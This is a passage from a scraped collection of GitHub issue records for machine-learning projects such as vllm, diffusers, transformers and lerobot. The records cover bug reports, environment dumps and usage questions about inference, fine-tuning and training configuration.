XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 48 bits physical, 48 bits virtual \nByte Order: Little Endian\nCPU(s): 32\nOn-line CPU(s) list: 0-31\nVendor ID: AuthenticAMD\nModel name: AMD Ryzen 9 9950X3D 16-Core Processor\nCPU family: 26\nModel: 68\nThread(s) per core: 2\nCore(s) per socket: 16\nSocket(s): 1\nStepping: 0\nFrequency boost: enabled\nCPU max MHz: 8839.3555\nCPU min MHz: 3000.0000\nBogoMIPS: 8583.32\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc cpuid extd_apicid aperfmperf rapl pni pclmulqdq monitor ssse3 fma cx16 sse4_1 sse4_2 movbe popcnt aes xsave avx f16c rdrand lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs skinit wdt tce topoext perfctr_core perfctr_nb bpext perfctr_llc mwaitx cpb cat_l3 cdp_l3 hw_pstate ssbd mba ibrs ibpb stibp ibrs_enhanced vmmcall fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb avx512cd 
sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local avx_vnni avx512_bf16 clzero irperf xsaveerptr rdpru wbnoinvd cppc arat npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold v_vmsave_vmload vgif v_spec_ctrl avx512vbmi umip pku ospke avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg avx512_vpopcntdq rdpid bus_lock_detect movdiri movdir64b overflow_recov succor smca fsrm avx512_vp2intersect flush_l1d\nVirtualization: AMD-V\nL1d cache: 768 KiB (16 instances)\nL1i cache: 512 KiB (16 instances)\nL2 cache: 16 MiB (16 instances)\nL3 cache: 128 MiB (2 instances)\nNUMA node(s): 1\nNUMA node0 CPU(s): 0-31\nVulnerability Gather data sampling: Not affected\nVulnerability Indirect target selection: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl and seccomp\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced / Automatic IBRS; IBPB conditional; STIBP always-on; PBRSB-eIBRS Not affected; BHI Not affected\nVulnerability Srbds: Not affected\nVulnerability Tsa: Not", "url": "https://github.com/vllm-project/vllm/issues/27634", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-28T06:24:38Z", "updated_at": "2025-10-28T15:57:47Z", "comments": 3, "user": "Septemberlemon" }, { "repo": "huggingface/candle", "number": 3151, "title": "Tensor conversion to_vec1() failing on 0.9.2-alpha.1 - Metal", "body": "Dependencies\n\n```toml\ncandle-core = { git = \"https://github.com/huggingface/candle\", rev = \"df618f8\", features = [\"metal\"] }\ncandle-nn = { git = \"https://github.com/huggingface/candle\", rev = \"df618f8\", features = [\"metal\"] }\ncandle-transformers = { git = \"https://github.com/huggingface/candle\", rev = \"df618f8\", features = [\"metal\"] }\n```\n\nRunning on Macbook M2 Pro - Metal - Tahoe 26.0.1\n\nSince upgrading to 0.9.2-alpha.1, BERT operations on Metal have started hanging when converting a rank-1 tensor to Vec<f32>. This seems to be affecting any ops that attempt to synchronize or move data from GPU to CPU. Not sure if this is directly related to the update, but rolling back to 0.9.1 or using the CPU as the device fixes the issue. 
\n\nSome examples of ops that are failing...\n\n```rust\ntensor.device().synchronize()\ntensor.to_device()\ntensor.to_vec1()\n```\n\nActual code being run...\n\n```rust\nlet (token_ids, token_type_ids, attention_mask) = self.encode_text(text)?;\n\nlet hidden_states = self\n .forward_model(&token_ids, &token_type_ids, &attention_mask)\n .await\n .map_err(|e| {\n log::error!(\"Failed to forward to model: {}\", e);\n e\n })?;\n\nlet embeddings = self\n .apply_mean_pooling(&hidden_states, &attention_mask)\n .map_err(|e| {\n log::error!(\"Failed to apply mean pooling: {}\", e);\n e\n })?;\n\n...\n\nfn apply_mean_pooling(\n &self,\n hidden_states: &Tensor,\n attention_mask: &Tensor,\n ) -> Result<Vec<f32>> {\n log::info!(\"Applying mean pooling to hidden states...\");\n\n let attention_mask_for_pooling = attention_mask\n .to_dtype(hidden_states.dtype())?\n .unsqueeze(2)?;\n let sum_mask = attention_mask_for_pooling.sum(1)?;\n\n let pooled = (hidden_states.broadcast_mul(&attention_mask_for_pooling)?).sum(1)?;\n let sum_mask_safe = sum_mask.clamp(NUMERICAL_STABILITY_EPSILON, f32::MAX)?;\n let pooled = pooled.broadcast_div(&sum_mask_safe)?;\n\n let denom = pooled\n .sqr()?\n .sum_keepdim(1)?\n .sqrt()?\n .clamp(NUMERICAL_STABILITY_EPSILON, f32::MAX)?;\n\n let pooled = pooled.broadcast_div(&denom)?;\n let pooled = pooled.squeeze(0)?;\n \n // HANGING HERE ... no errors\n // Tensor shape - Tensor[dims 1024; f32, metal:4294968337]\n let embeddings = pooled.to_vec1::<f32>().map_err(|e| Error::TensorOp {\n operation: format!(\"Failed to convert tensor to f32 vector: {}\", e),\n })?;\n\n Ok(embeddings)\n }\n```", "url": "https://github.com/huggingface/candle/issues/3151", "state": "closed", "labels": [], "created_at": "2025-10-27T21:36:17Z", "updated_at": "2025-11-06T22:44:14Z", "comments": 2, "user": "si-harps" }, { "repo": "vllm-project/vllm", "number": 27604, "title": "[Bug]: Is Flashinfer Attn backend supposed to work with FP8 KV cache on Hopper?", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Amazon Linux 2023.7.20250428 (x86_64)\nGCC version : (GCC) 11.5.0 20240719 (Red Hat 11.5.0-5)\nClang version : Could not collect\nCMake version : version 3.26.4\nLibc version : glibc-2.34\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.6 (main, May 6 2025, 20:22:13) [GCC 11.5.0 20240719 (Red Hat 11.5.0-5)] (64-bit runtime)\nPython platform : Linux-6.1.134-150.224.amzn2023.x86_64-x86_64-with-glibc2.34\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.93\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : \nGPU 0: NVIDIA H100 80GB HBM3\nGPU 1: NVIDIA H100 80GB HBM3\nGPU 2: NVIDIA H100 80GB HBM3\nGPU 3: NVIDIA H100 80GB HBM3\nGPU 4: NVIDIA H100 80GB HBM3\nGPU 5: NVIDIA H100 80GB HBM3\nGPU 6: NVIDIA H100 80GB HBM3\nGPU 7: NVIDIA H100 80GB HBM3\n\nNvidia driver version : 570.133.20\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 48 bits physical, 48 bits virtual\nByte Order: Little Endian\nCPU(s): 192\nOn-line CPU(s) list: 0-191\nVendor ID: AuthenticAMD\nModel name: AMD EPYC 7R13 Processor\nCPU family: 25\nModel: 1\nThread(s) per core: 2\nCore(s) per socket: 48\nSocket(s): 2\nStepping: 1\nBogoMIPS: 5299.99\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc cpuid extd_apicid aperfmperf tsc_known_freq pni pclmulqdq monitor ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm cmp_legacy cr8_legacy abm sse4a misalignsse 3dnowprefetch topoext perfctr_core invpcid_single ssbd ibrs ibpb stibp vmmcall fsgsbase bmi1 avx2 smep bmi2 invpcid rdseed adx smap clflushopt clwb sha_ni xsaveopt xsavec xgetbv1 clzero xsaveerptr rdpru wbnoinvd arat npt nrip_save vaes vpclmulqdq rdpid\nHypervisor vendor: KVM\nVirtualization type: full\nL1d cache: 3 MiB (96 instances)\nL1i cache: 3 MiB (96 instances)\nL2 cache: 48 MiB (96 instances)\nL3 cache: 384 MiB (12 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-47,96-143\nNUMA node1 CPU(s): 48-95,144-191\nVulnerability Gather data sampling: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Mitigation; safe RET\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Retpolines; IBPB conditional; IBRS_FW; STIBP always-on; RSB filling; PBRSB-eIBRS Not affected; BHI Not affected\nVulnerability Srbds: 
Not affected\nVulnerability Tsx async abort: Not affected\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] flashinfer-python==0.3.1\n[pip3] numpy==2.2.6\n[pip3] nvidia-cublas-cu12==12.8.4.1\n[pip3] nvidia-cuda-cupti-cu12==12.8.90\n[pip3] nvidia-cuda-nvrtc-cu12==12.8.93\n[pip3] nvidia-cuda-runtime-cu12==12.8.90\n[pip3] nvidia-cudnn-cu12==9.10.2.21\n[pip3] nvidia-cudnn-frontend==1.15.0\n[pip3] nvidia-cufft-cu12==11.3.3.83\n[pi", "url": "https://github.com/vllm-project/vllm/issues/27604", "state": "open", "labels": [ "bug", "nvidia" ], "created_at": "2025-10-27T20:22:37Z", "updated_at": "2025-11-06T02:37:17Z", "comments": 10, "user": "jmkuebler" }, { "repo": "huggingface/smolagents", "number": 1834, "title": "Discussion: how to edit the messages sent to the underlying LLM", "body": "Hi! I'm working on a feature to allow a user to add callbacks to modify the content before it is sent to the LLM, inside the agent loop. \n\nI noticed this strange behavior where the first user message must start with \"New Task:\", otherwise I get this cryptic and misleading error message.\n\n\n\"Error:\\nError while parsing tool call from model output: The model output does not contain any JSON blob.\\nNow let's retry: take care not to repeat previous errors! If you have retried several times, try a completely different approach.\\n\"\n\nSo I think I have two questions (or maybe just one):\n\n1. Is my approach of controlling the message flow by wrapping the `generate` member function of a Smolagent correct? Or do you recommend a better way to modify messages before sending them to the underlying LLM?\n2. Is it expected that the first user message needs to start with \"New Task:\", or have I found a bug or missing assertion somewhere in the code? Thanks!\n\nhttps://github.com/mozilla-ai/any-agent/blob/f2475d7507c5a78e241ff5f0883b546d796d29fc/src/any_agent/callbacks/wrappers/smolagents.py#L75\n\nI'm on smolagents==1.22.0, Python 3.13.\n\nUPDATE: I'm no longer sure that adding \"New Task:\" is the fix; I am still seeing intermittent errors even when I have that text added. It seems like there is some sort of race condition, and I'm confused about where the \"messages\" content should be edited, since it seems like maybe it's being stored or referenced in multiple places? Any help appreciated!\n", "url": "https://github.com/huggingface/smolagents/issues/1834", "state": "closed", "labels": [], "created_at": "2025-10-27T17:28:38Z", "updated_at": "2025-10-27T19:02:39Z", "user": "njbrake" }, { "repo": "huggingface/peft", "number": 2873, "title": "Can I use LoRA fine-tuning twice?", "body": "I\u2019m planning to work with a two-stage LoRA fine-tuning pipeline (Stage 1: SFT with code completion outputs; Stage 2: SFT with full-code outputs; RL follows). My question is:\nWhen I continue training the same LoRA adapter in Stage 2, will I risk overwriting or degrading the knowledge learned during Stage 1? 
In other words, does continuing on the same adapter effectively preserve the Stage 1 capabilities, or should I be using a separate adapter (or merging strategy) to ensure both sets of skills remain intact?\nThank you for any guidance or best\u2010practice pointers!", "url": "https://github.com/huggingface/peft/issues/2873", "state": "closed", "labels": [], "created_at": "2025-10-27T12:51:45Z", "updated_at": "2025-12-05T15:05:00Z", "comments": 8, "user": "tohokulgq" }, { "repo": "vllm-project/vllm", "number": 27572, "title": "[Bug]: chat/completions stream intermittently returns null as finish_reason", "body": "### Your current environment\n\n```\nMy env:\nvllm 0.10.0\n```\n\n\n### \ud83d\udc1b Describe the bug\n\n\n```\n\n+ curl -kLsS https://127.0.0.1:7888/v1/chat/completions -H 'Content-Type: application/json' --data '{\n \"model\": \"ibm/granite-3-8b-instruct\",\n \"stream\": true,\n \"messages\": [\n {\n \"role\": \"system\",\n \"content\": \"You are a helpful assistant.\"\n },\n {\n \"role\": \"user\",\n \"content\": \"What is the weather like in Warsaw?\"\n }\n ],\n \"tools\": [\n {\n \"type\": \"function\",\n \"function\": {\n \"name\": \"get_current_weather\",\n \"description\": \"Get the current weather in a given location\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"location\": {\n \"type\": \"string\",\n \"description\": \"The city and state, e.g. San Francisco, CA\"\n },\n \"unit\": {\n \"type\": \"string\",\n \"enum\": [\"celsius\", \"fahrenheit\"]\n }\n }\n },\n \"required\": [\"location\"]\n }\n }\n ],\n \"tool_choice\": \"auto\"\n }'\ndata: {\"id\":\"chatcmpl-6ca98c2f19c13c19f39013dfb78bcece\",\"object\":\"chat.completion.chunk\",\"created\":1761566772,\"model\":\"ibm/granite-3-8b-instruct\",\"choices\":[{\"index\":0,\"delta\":{\"role\":\"assistant\",\"content\":\"\"},\"logprobs\":null,\"finish_reason\":null}]}\n\ndata: {\"id\":\"chatcmpl-6ca98c2f19c13c19f39013dfb78bcece\",\"object\":\"chat.completion.chunk\",\"created\":1761566772,\"model\":\"ibm/granite-3-8b-instruct\",\"choices\":[{\"index\":0,\"delta\":{\"content\":\"<\"},\"logprobs\":null,\"finish_reason\":null}]}\n\ndata: {\"id\":\"chatcmpl-6ca98c2f19c13c19f39013dfb78bcece\",\"object\":\"chat.completion.chunk\",\"created\":1761566772,\"model\":\"ibm/granite-3-8b-instruct\",\"choices\":[{\"index\":0,\"delta\":{\"content\":\"tool\"},\"logprobs\":null,\"finish_reason\":null}]}\n\ndata: {\"id\":\"chatcmpl-6ca98c2f19c13c19f39013dfb78bcece\",\"object\":\"chat.completion.chunk\",\"created\":1761566772,\"model\":\"ibm/granite-3-8b-instruct\",\"choices\":[{\"index\":0,\"delta\":{\"content\":\"_\"},\"logprobs\":null,\"finish_reason\":null}]}\n\ndata: {\"id\":\"chatcmpl-6ca98c2f19c13c19f39013dfb78bcece\",\"object\":\"chat.completion.chunk\",\"created\":1761566772,\"model\":\"ibm/granite-3-8b-instruct\",\"choices\":[{\"index\":0,\"delta\":{\"content\":\"call\"},\"logprobs\":null,\"finish_reason\":null}]}\n\ndata: {\"id\":\"chatcmpl-6ca98c2f19c13c19f39013dfb78bcece\",\"object\":\"chat.completion.chunk\",\"created\":1761566772,\"model\":\"ibm/granite-3-8b-instruct\",\"choices\":[{\"index\":0,\"delta\":{\"content\":\">\"},\"logprobs\":null,\"finish_reason\":null}]}\n\ndata: [DONE]\n```\nThis happens after running several requests sequentially.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked 
questions.", "url": "https://github.com/vllm-project/vllm/issues/27572", "state": "open", "labels": [ "bug" ], "created_at": "2025-10-27T12:14:03Z", "updated_at": "2025-11-24T20:27:24Z", "comments": 13, "user": "shuynh2017" }, { "repo": "huggingface/chat-ui", "number": 1957, "title": "Fail to use proxy", "body": "How can I make this web app go through a local proxy? \n\nI tried a few methods, none of which worked. \n", "url": "https://github.com/huggingface/chat-ui/issues/1957", "state": "open", "labels": [ "support" ], "created_at": "2025-10-27T06:31:51Z", "updated_at": "2025-10-30T03:31:24Z", "comments": 2, "user": "geek0011" }, { "repo": "huggingface/diffusers", "number": 12547, "title": "Fine tuning Dreambooth Flux Kontext I2I Error: the following arguments are required: --instance_prompt", "body": "### Describe the bug\n\nHello HF team, @sayakpaul @bghira\n\nI'm encountering a persistent issue when trying to fine-tune the black-forest-labs/FLUX.1-Kontext-dev model using the train_dreambooth_lora_flux_kontext.py script.\n\nI am following the [official README instructions](https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/README_flux.md#training-kontext) for Image-to-Image (I2I) finetuning. My goal is to train a transformation on my own dataset, which is structured for I2I (condition image, target image, and text instruction).\n\n### The Problem\nEvery time I run the script with the correct arguments for I2I finetuning, I get: `the following arguments are required: --instance_prompt`\n\nWhen I run this [Reproduction], I receive the error: `the following arguments are required: --instance_prompt.`\n\nTo isolate the issue from my personal dataset, I also tested the exact example command provided in the documentation (the one using `kontext-community/relighting`). I found that this command also fails with the identical `the following arguments are required: --instance_prompt` error.\n\nGiven that both my custom command and the official example command are failing in the same way, I am trying to understand the origin of this error. It seems the `--instance_prompt` argument is being required even when all I2I-specific arguments are provided.\n\n### Environment\n**Script**: `examples/dreambooth/train_dreambooth_lora_flux_kontext.py`\n\n**Diffusers Version**: I am using the specific commit `05e7a854d0a5661f5b433f6dd5954c224b104f0b` (installed via `pip install -e .` from a clone), as recommended in the README.\n\nCould you please help me understand why this might be happening? 
Is this expected behavior, or am I perhaps missing a configuration step?\n\nThank you for your time!\n\n### Reproduction\n\n### How to Reproduce\nI am running the following command, which provides all the necessary I2I finetuning arguments (`dataset_name`, `image_column`, `cond_image_column`, and `caption_column`) for my public dataset:\n\n```\naccelerate launch /local-git-path/train_dreambooth_lora_flux_kontext.py \\\n --pretrained_model_name_or_path=\"black-forest-labs/FLUX.1-Kontext-dev\" \\\n --output_dir=\"/local-path/kontext-finetuning-v1\" \\\n --dataset_name=\"MichaelMelgarejoTotto/mi-dataset-kontext\" \\\n --image_column=\"output\" \\\n --cond_image_column=\"file_name\" \\\n --caption_column=\"instruccion\" \\\n --mixed_precision=\"bf16\" \\\n --resolution=1024 \\\n --train_batch_size=1 \\\n --guidance_scale=1 \\\n --gradient_accumulation_steps=4 \\\n --gradient_checkpointing \\\n --optimizer=\"adamw\" \\\n --use_8bit_adam \\\n --cache_latents \\\n --learning_rate=1e-4 \\\n --lr_scheduler=\"constant\" \\\n --lr_warmup_steps=200 \\\n --max_train_steps=1000 \\\n --rank=16 \\\n --seed=\"0\" \n```\n\n\n### Logs\n\n```shell\ntrain_dreambooth_lora_flux_kontext.py: error: the following arguments are required: --instance_prompt\n```\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.35.0.dev0\n- Platform: Linux-4.18.0-305.3.1.el8.x86_64-x86_64-with-glibc2.28\n- Running on Google Colab?: No\n- Python version: 3.10.19\n- PyTorch version (GPU?): 2.7.1+cu118 (False)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Huggingface_hub version: 0.36.0\n- Transformers version: 4.57.1\n- Accelerate version: 1.11.0\n- PEFT version: 0.17.1\n- Bitsandbytes version: 0.48.1\n- Safetensors version: 0.6.2\n- xFormers version: not installed\n- Accelerator: NA\n- Using GPU in script?: \n- Using distributed or parallel set-up in script?: \n\n\"Image\"\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/12547", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-27T00:21:34Z", "updated_at": "2025-10-28T02:31:42Z", "comments": 7, "user": "MichaelMelgarejoFlorez" }, { "repo": "huggingface/transformers", "number": 41876, "title": "LlamaAttention num_heads", "body": "### System Info\n\nIn older versions of transformers, LlamaAttention initialized the attribute num_heads. \n\nclass LlamaAttention(nn.Module):\n def __init__(self, config):\n self.num_heads = config.num_attention_heads\n self.head_dim = config.hidden_size // config.num_attention_heads\n\nHowever, in recent versions this attribute has been removed, causing mismatches when running older code. It seems num_key_value_heads is also deprecated. This issue could be addressed by adding:\n self.num_heads = config.num_attention_heads # shanhx\n self.num_key_value_heads = config.num_key_value_heads\n\nAre there any reasons why these attributes were removed? Is this intended, or a bug?\n\n\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nThe num_heads attribute still remained in 4.44, but is missing in 4.54. \n\n### Expected behavior\n\nMissing many attributes in LlamaAttention. 
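\n\nA minimal backward-compatibility shim, as a sketch (it monkey-patches the attributes back from the standard config fields; not an official fix):\n\n```python\nfrom transformers.models.llama.modeling_llama import LlamaAttention\n\n_orig_init = LlamaAttention.__init__\n\n\ndef _patched_init(self, config, *args, **kwargs):\n    _orig_init(self, config, *args, **kwargs)\n    # Restore the attributes removed by the attention refactor.\n    self.num_heads = config.num_attention_heads\n    self.num_key_value_heads = config.num_key_value_heads\n\n\nLlamaAttention.__init__ = _patched_init\n```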
", "url": "https://github.com/huggingface/transformers/issues/41876", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-27T00:07:31Z", "updated_at": "2025-10-31T00:13:31Z", "comments": 2, "user": "shanhx2000" }, { "repo": "huggingface/transformers", "number": 41874, "title": "Distributed training of SigCLIP", "body": "https://github.com/huggingface/transformers/blob/v4.57.1/src/transformers/models/siglip/modeling_siglip.py#L983, here define how to compute sigclip loss. In sigclip, different tpu will exchange data with each other. I want to know how to train a model in this way.", "url": "https://github.com/huggingface/transformers/issues/41874", "state": "closed", "labels": [], "created_at": "2025-10-26T14:43:51Z", "updated_at": "2025-12-04T08:02:55Z", "comments": 1, "user": "zyk1559676097-dot" }, { "repo": "huggingface/transformers", "number": 41861, "title": "transformers.Adafactor is almost 2x slower on Windows than Linux - even WSL is slow what can be reason?", "body": "I am training Qwen Image model with Kohya Musubi tuner : https://github.com/kohya-ss/musubi-tuner\n \nExactly same setup and same machine on Linux is almost 2x faster\n\n9.5 second / it vs 5.8 second / it\n\nOn Windows it can't utilize GPU power it utilizes like 250 watt out of 575 watt\n\nWhat can be culprit?\n\ntransformers==4.54.1\ntorch 2.8\nCUDA 12.9\n\ntested on RTX 5090\n\nthis is what codex tells but i don't know if it is true doesnt make sense to me\n\n\"Image\"\n\n### Who can help?\n\ntrainer: @SunMarc \nkernels: @MekkCyber @drbh \n\n\n", "url": "https://github.com/huggingface/transformers/issues/41861", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-25T15:49:47Z", "updated_at": "2025-12-03T08:02:55Z", "user": "FurkanGozukara" }, { "repo": "huggingface/transformers", "number": 41859, "title": "Human Verification not working?", "body": "### System Info\n\nHello! I need your help because I can't verify my identity via email: I receive a link, open it, but get a blank page and nothing else(((\nI've tried several times.\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n1. Navigate to the Hugging Face website.\n2. Register or log in to your account.\n3. Go to the identity verification section.\n4. Submit a request for the identity verification link.\n5. Get the confirmation email to arrive.\n6. Follow confirmation link in email\n7. Get blank page in site example https://huggingface.co/email_confirmation/zKFZszGtcabRsYOURYmCQkXdfzIY\n\n### Expected behavior\n\nThe identity verification link should work", "url": "https://github.com/huggingface/transformers/issues/41859", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-25T10:48:52Z", "updated_at": "2025-10-26T12:29:10Z", "comments": 4, "user": "thefued" }, { "repo": "huggingface/lerobot", "number": 2311, "title": "Question: How I can train only online without dataset?", "body": "How I can train only online? without need of dataset. Can I do it without hugging face repo id? 
only locally?\nI tried it like this, without success:\n\n```\n cat > \"train_cfg.json\" <<'JSON'\n {\n \"job_name\": \"hilserl_fetch_pick_v4_cpu\",\n \"seed\": 0,\n \"env\": {\n \"type\": \"gymnasium-robotics\",\n \"task\": \"FetchPickAndPlace-v4\",\n \"episode_length\": 200,\n \"features_map\": {\n \"action\": \"action\",\n \"agent_pos\": \"observation.state\",\n \"top\": \"observation.image\",\n \"pixels/top\": \"observation.image\"\n },\n \"features\": {\n \"action\": {\n \"type\": \"ACTION\",\n \"shape\": [\n 4\n ]\n },\n \"agent_pos\": {\n \"type\": \"STATE\",\n \"shape\": [\n 4\n ]\n },\n \"pixels/top\": {\n \"type\": \"VISUAL\",\n \"shape\": [\n 480,\n 480,\n 3\n ]\n }\n }\n },\n \"policy\": {\n \"type\": \"sac\",\n \"device\": \"cpu\",\n \"concurrency\": {\n \"actor\": \"threads\",\n \"learner\": \"threads\"\n },\n \"repo_id\": \"None\",\n \"push_to_hub\": false\n },\n \"dataset\": { \n \"repo_id\": \"online-buffer\",\n \"root\": \"${{ github.workspace }}/dataset\",\n \"use_imagenet_stats\": true\n }\n }\n JSON\n\n mkdir -p dataset/online-buffer\n\n export HF_HUB_OFFLINE=1\n export HF_HUB_DISABLE_TELEMETRY=1\n export HF_DATASETS_OFFLINE=1\n export WANDB_MODE=disabled\n\n # Launch learner and actor (one shell)\n python -m lerobot.rl.learner --config_path \"train_cfg.json\"\n python -m lerobot.rl.actor --config_path \"train_cfg.json\"\n```", "url": "https://github.com/huggingface/lerobot/issues/2311", "state": "open", "labels": [ "question", "dataset" ], "created_at": "2025-10-25T05:07:48Z", "updated_at": "2025-10-27T08:50:11Z", "user": "talregev" }, { "repo": "vllm-project/vllm", "number": 27505, "title": "[Bug]: Value error, Found conflicts between 'rope_type=default' (modern field) and 'type=mrope'", "body": "### Your current environment\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nvllm 0.11.0\ntransformers 5.0.0.dev0\ntorch 2.8.0+cu129\n\nmodel base: Qwen2.5-VL-7B-instruct. How to solve this problem\uff1f\n\"Image\"\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27505", "state": "open", "labels": [ "bug" ], "created_at": "2025-10-25T04:39:53Z", "updated_at": "2025-10-26T07:33:27Z", "comments": 1, "user": "asirgogogo" }, { "repo": "vllm-project/vllm", "number": 27504, "title": "[Usage]: `add_vision_id` ignored for Qwen 2.5-VL-32B-Instruct", "body": "### Your current environment\n\n```text\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.3 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : Could not collect\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.3 (main, Aug 14 2025, 17:47:21) [GCC 13.3.0] (64-bit runtime)\nPython platform : Linux-6.8.0-85-generic-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.93\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : \nGPU 0: NVIDIA RTX A6000\nGPU 1: NVIDIA RTX A6000\nGPU 2: NVIDIA RTX A6000\nGPU 3: NVIDIA RTX A6000\n\nNvidia driver version : 570.124.06\ncuDNN version : Probably one of the following:\n/usr/local/cuda-12.0/targets/x86_64-linux/lib/libcudnn.so.9.8.0\n/usr/local/cuda-12.0/targets/x86_64-linux/lib/libcudnn_adv.so.9.8.0\n/usr/local/cuda-12.0/targets/x86_64-linux/lib/libcudnn_cnn.so.9.8.0\n/usr/local/cuda-12.0/targets/x86_64-linux/lib/libcudnn_engines_precompiled.so.9.8.0\n/usr/local/cuda-12.0/targets/x86_64-linux/lib/libcudnn_engines_runtime_compiled.so.9.8.0\n/usr/local/cuda-12.0/targets/x86_64-linux/lib/libcudnn_graph.so.9.8.0\n/usr/local/cuda-12.0/targets/x86_64-linux/lib/libcudnn_heuristic.so.9.8.0\n/usr/local/cuda-12.0/targets/x86_64-linux/lib/libcudnn_ops.so.9.8.0\n/usr/local/cuda-12.8/targets/x86_64-linux/lib/libcudnn.so.9.8.0\n/usr/local/cuda-12.8/targets/x86_64-linux/lib/libcudnn_adv.so.9.8.0\n/usr/local/cuda-12.8/targets/x86_64-linux/lib/libcudnn_cnn.so.9.8.0\n/usr/local/cuda-12.8/targets/x86_64-linux/lib/libcudnn_engines_precompiled.so.9.8.0\n/usr/local/cuda-12.8/targets/x86_64-linux/lib/libcudnn_engines_runtime_compiled.so.9.8.0\n/usr/local/cuda-12.8/targets/x86_64-linux/lib/libcudnn_graph.so.9.8.0\n/usr/local/cuda-12.8/targets/x86_64-linux/lib/libcudnn_heuristic.so.9.8.0\n/usr/local/cuda-12.8/targets/x86_64-linux/lib/libcudnn_ops.so.9.8.0\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 46 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 32\nOn-line CPU(s) list: 0-31\nVendor ID: GenuineIntel\nModel name: Intel(R) Xeon(R) Gold 6346 